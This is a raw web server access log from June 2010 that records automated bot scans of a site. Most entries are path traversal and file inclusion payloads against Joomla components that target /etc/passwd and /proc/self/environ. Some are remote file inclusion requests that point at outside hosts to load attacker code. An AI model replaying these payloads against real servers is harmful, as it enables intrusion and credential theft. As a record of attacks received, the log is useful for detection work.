72.55.146.140 - - [02/Jun/2010:05:45:51 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.55.146.140 - - [02/Jun/2010:05:45:51 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
222.122.52.80 - - [02/Jun/2010:05:46:01 -0500] "GET //allopass.php?mosConfig_live_site=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
222.122.52.80 - - [02/Jun/2010:05:46:01 -0500] "GET /logs//allopass.php?mosConfig_live_site=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
76.73.80.242 - - [02/Jun/2010:05:46:05 -0500] "GET /logs/access_log.1274832000//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
76.73.80.242 - - [02/Jun/2010:05:46:06 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
76.73.80.242 - - [02/Jun/2010:05:46:06 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
89.200.142.93 - - [02/Jun/2010:05:46:32 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.823"
89.200.142.93 - - [02/Jun/2010:05:46:33 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
89.200.142.93 - - [02/Jun/2010:05:46:33 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
204.188.235.66 - - [02/Jun/2010:05:46:35 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
204.188.235.66 - - [02/Jun/2010:05:46:36 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
204.188.235.66 - - [02/Jun/2010:05:46:36 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.55.146.200 - - [02/Jun/2010:05:47:25 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blank-invitations.whilt.com/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
72.55.146.200 - - [02/Jun/2010:05:47:25 -0500] "GET /logs/access_log.1205107200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blank-invitations.whilt.com/id.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
72.55.146.200 - - [02/Jun/2010:05:47:25 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blank-invitations.whilt.com/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
91.121.201.191 - - [02/Jun/2010:05:48:29 -0500] "GET /?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
91.121.201.191 - - [02/Jun/2010:05:48:29 -0500] "GET /?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.11.114 - - [02/Jun/2010:05:48:44 -0500] "GET /?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.11.114 - - [02/Jun/2010:05:48:44 -0500] "GET /?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
77.222.56.62 - - [02/Jun/2010:05:49:09 -0500] "GET /index.php?root_path=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
77.222.56.62 - - [02/Jun/2010:05:49:10 -0500] "GET /logs/index.php?root_path=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
94.23.11.114 - - [02/Jun/2010:05:49:20 -0500] "GET /logs/access_log.1274832000//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.23.11.114 - - [02/Jun/2010:05:49:20 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.11.114 - - [02/Jun/2010:05:49:20 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
211.132.187.170 - - [02/Jun/2010:05:49:41 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
211.132.187.170 - - [02/Jun/2010:05:49:42 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
211.132.187.170 - - [02/Jun/2010:05:49:43 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
77.222.56.62 - - [02/Jun/2010:05:51:00 -0500] "GET //allopass.php?mosConfig_live_site=%0Did.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
77.222.56.62 - - [02/Jun/2010:05:51:00 -0500] "GET /logs//allopass.php?mosConfig_live_site=%0Did.jpg?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
207.7.108.203 - - [02/Jun/2010:05:51:23 -0500] "GET /logs/access_log.1274832000///index.php?option=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.7.108.203 - - [02/Jun/2010:05:51:23 -0500] "GET ///index.php?option=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.7.108.203 - - [02/Jun/2010:05:51:23 -0500] "GET /logs///index.php?option=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
211.132.187.170 - - [02/Jun/2010:05:51:27 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
211.132.187.170 - - [02/Jun/2010:05:51:29 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
211.132.187.170 - - [02/Jun/2010:05:51:31 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
173.201.187.126 - - [02/Jun/2010:05:51:51 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
173.201.187.126 - - [02/Jun/2010:05:51:51 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
173.201.187.126 - - [02/Jun/2010:05:51:51 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
204.188.235.66 - - [02/Jun/2010:05:52:35 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
204.188.235.66 - - [02/Jun/2010:05:52:35 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
204.188.235.66 - - [02/Jun/2010:05:52:35 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.201.187.126 - - [02/Jun/2010:05:52:47 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
173.201.187.126 - - [02/Jun/2010:05:52:47 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
173.201.187.126 - - [02/Jun/2010:05:52:47 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [02/Jun/2010:05:52:51 -0500] "GET /logs/access_log.1274832000/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [02/Jun/2010:05:52:51 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
124.217.229.185 - - [02/Jun/2010:05:52:52 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
67.195.112.180 - - [02/Jun/2010:05:52:59 -0500] "GET /logs/access_log.1165795200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.122.52.80 - - [02/Jun/2010:05:53:11 -0500] "GET //allopass-error.php?mosConfig_live_site=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
222.122.52.80 - - [02/Jun/2010:05:53:12 -0500] "GET /logs//allopass-error.php?mosConfig_live_site=http://royx.interfree.it/id.jpg?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
74.54.63.138 - - [02/Jun/2010:05:54:10 -0500] "GET /logs/access_log.1274832000/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [02/Jun/2010:05:54:10 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [02/Jun/2010:05:54:10 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
89.200.142.93 - - [02/Jun/2010:05:54:19 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.823"
89.200.142.93 - - [02/Jun/2010:05:54:20 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
89.200.142.93 - - [02/Jun/2010:05:54:20 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
93.174.120.30 - - [02/Jun/2010:05:54:35 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
93.174.120.30 - - [02/Jun/2010:05:54:35 -0500] "GET /logs/?option=com_gcalendar&controller=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 200 7924 "-""Mozilla/5.0"
93.174.120.30 - - [02/Jun/2010:05:54:35 -0500] "GET /?option=com_gcalendar&controller=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
91.121.201.191 - - [02/Jun/2010:05:54:50 -0500] "GET /?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
91.121.201.191 - - [02/Jun/2010:05:54:51 -0500] "GET /?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
93.174.120.30 - - [02/Jun/2010:05:55:29 -0500] "GET /logs/access_log.1273363200/?option=com_gcalendar&controller=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
207.46.13.85 - - [02/Jun/2010:05:56:41 -0500] "GET /logs/access_log.1160006400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.85 - - [02/Jun/2010:05:56:42 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
76.12.58.212 - - [02/Jun/2010:05:56:44 -0500] "GET /logs/access_log.1274832000/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
76.12.58.212 - - [02/Jun/2010:05:56:44 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
76.12.58.212 - - [02/Jun/2010:05:56:45 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
91.121.201.191 - - [02/Jun/2010:05:57:29 -0500] "GET /logs/access_log.1274832000/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
91.121.201.191 - - [02/Jun/2010:05:57:29 -0500] "GET /?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
91.121.201.191 - - [02/Jun/2010:05:57:29 -0500] "GET /logs/access_log.1274832000/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
91.121.201.191 - - [02/Jun/2010:05:57:29 -0500] "GET /logs/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.803"
91.121.201.191 - - [02/Jun/2010:05:57:29 -0500] "GET /?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
91.121.201.191 - - [02/Jun/2010:05:57:29 -0500] "GET /logs/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.803"
209.126.254.141 - - [02/Jun/2010:05:58:35 -0500] "GET /logs/access_log.1274832000//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.126.254.141 - - [02/Jun/2010:05:58:36 -0500] "GET /logs/access_log.1274832000//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""libwww-perl/5.76"
209.126.254.141 - - [02/Jun/2010:05:58:37 -0500] "GET /logs/access_log.1274832000//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-"""
209.126.254.141 - - [02/Jun/2010:05:58:37 -0500] "GET /logs/access_log.1274832000//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-"""
209.44.120.2 - - [02/Jun/2010:05:59:17 -0500] "GET //*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
91.121.201.191 - - [02/Jun/2010:05:59:55 -0500] "GET /logs/access_log.1274832000/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
91.121.201.191 - - [02/Jun/2010:05:59:56 -0500] "GET /?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
91.121.201.191 - - [02/Jun/2010:05:59:56 -0500] "GET /logs/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.803"
194.100.228.237 - - [02/Jun/2010:06:00:43 -0500] "GET /logs/access_log.1274832000//index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.23.11.114 - - [02/Jun/2010:06:00:44 -0500] "GET /logs/access_log.1274832000/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
194.100.228.237 - - [02/Jun/2010:06:00:44 -0500] "GET //index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.11.114 - - [02/Jun/2010:06:00:44 -0500] "GET /?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
194.100.228.237 - - [02/Jun/2010:06:00:44 -0500] "GET /logs//index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.11.114 - - [02/Jun/2010:06:00:44 -0500] "GET /logs/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.803"
94.23.11.114 - - [02/Jun/2010:06:01:01 -0500] "GET /logs/access_log.1274832000/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
94.23.11.114 - - [02/Jun/2010:06:01:01 -0500] "GET /?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.11.114 - - [02/Jun/2010:06:01:02 -0500] "GET /logs/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.803"
91.121.201.191 - - [02/Jun/2010:06:01:24 -0500] "GET /logs/access_log.1274832000/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
91.121.201.191 - - [02/Jun/2010:06:01:24 -0500] "GET /?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
91.121.201.191 - - [02/Jun/2010:06:01:24 -0500] "GET /logs/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.803"
189.108.172.26 - - [02/Jun/2010:06:02:03 -0500] "GET /logs/access_log.1272326400//uigaproxy/include/template.php?content=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
189.108.172.26 - - [02/Jun/2010:06:02:03 -0500] "GET /logs/access_log.1270598400//uigaproxy/include/template.php?content=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
189.108.172.26 - - [02/Jun/2010:06:02:03 -0500] "GET /logs//uigaproxy/include/template.php?content=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
189.108.172.26 - - [02/Jun/2010:06:02:06 -0500] "GET //uigaproxy/include/template.php?content=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
189.108.172.26 - - [02/Jun/2010:06:03:08 -0500] "GET /logs/access_log.1272240000//uigaproxy/include/template.php?content=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
209.44.120.2 - - [02/Jun/2010:06:03:30 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.44.120.2 - - [02/Jun/2010:06:03:31 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
65.49.28.194 - - [02/Jun/2010:06:04:19 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.820"
65.49.28.194 - - [02/Jun/2010:06:04:19 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.820"
209.44.120.2 - - [02/Jun/2010:06:04:20 -0500] "GET /?index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
209.44.120.2 - - [02/Jun/2010:06:04:34 -0500] "GET /?index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
38.101.148.126 - - [02/Jun/2010:06:05:24 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [02/Jun/2010:06:05:29 -0500] "GET /logs/access_log.1204416000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [02/Jun/2010:06:06:02 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [02/Jun/2010:06:06:08 -0500] "GET /logs/access_log.1215475200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
67.227.143.132 - - [02/Jun/2010:06:06:18 -0500] "GET /logs/access_log.1274832000/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
67.227.143.132 - - [02/Jun/2010:06:06:18 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.227.143.132 - - [02/Jun/2010:06:06:18 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
91.121.201.191 - - [02/Jun/2010:06:06:50 -0500] "GET /logs/access_log.1274832000/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
